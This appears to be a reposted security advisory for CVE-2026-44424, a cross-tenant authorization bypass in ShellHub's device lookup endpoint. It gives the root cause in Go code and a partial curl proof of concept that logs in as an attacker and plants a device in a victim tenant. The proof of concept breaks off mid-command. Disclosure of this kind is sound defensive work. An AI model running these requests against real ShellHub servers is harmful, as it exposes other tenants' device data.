安全情报

CVE-2026-44424 - ShellHub has cross-tenant IDOR in `GET /api/devices/:uid` that discloses device

AiRedTeam

09 May 2026 • 阅读时间 1 分钟

📡 GitHub-Advisory · 2026-05-06

CVE-2026-44424 - ShellHub has cross-tenant IDOR in `GET /api/devices/:uid` that discloses device

CVE-2026-44424

GHSA-j72x-xfwg-783f MEDIUM go/github.com/shellhub-io/shellhub

CVE: CVE-2026-44424

Summary

GET /api/devices/:uid returns the full device object whenever the caller is authenticated, without verifying that the device belongs to the caller's namespace (tenant). Any authenticated user (JWT or API Key) who knows or can guess a device UID can read device metadata from any other namespace.

Severity

CVSS 3.1: 7.5 (High)

CWE-639 — Authorization Bypass Through User-Controlled Key

Affected versions

ShellHub Community v0.24.1 (validated). Likely all prior versions that share this handler.

Root cause

api/services/device.go:97-104 — GetDevice resolves the device by UID without scoping to the caller's tenant:

```go

func (s *service) GetDevice(ctx context.Context, uid models.UID) (*models.Device, error) {

device, err := s.store.DeviceResolve(ctx, store.DeviceUIDResolver, string(uid))

// ⚠️ missing: s.store.Options().InNamespace(tenant)

...

}

```

Compare with DeleteDevice in the same file (line 137) which correctly applies InNamespace(tenant).

The Authorize middleware (api/routes/middleware/authorize.go:12-27) only checks that a tenant is present in the context — not that the resource belongs to that tenant.

Proof of concept (validated live against v0.24.1)

Pre-requisite: attacker has any valid user account and knows a target tenant_id (UUIDs frequently leak via UI URLs, email invites, support channels, or prior namespace membership).

```bash

ATTACKER_TOKEN=$(curl -s -X POST http://target/api/login \

-H 'Content-Type: application/json' \

-d '{"username":"attacker","password":"..."}' | jq -r .token)

TARGET_TENANT="<victim-tenant-uuid>"

# Plant a device in the victim tenant via the public device-auth endpoint

# (this also works when the victim already has devices and the attacker

# merely guessed/obtained a real UID via another vector)

VICTIM_UID=$(curl -s -X POST http://target/api/devices/auth \

-H 'Content-Type: application/json' \

-d "{

\"info\":{\"id\":\

📌 来源: GitHub-Advisory | 🆔 CVE-2026-44424 | 📅 2026-05-06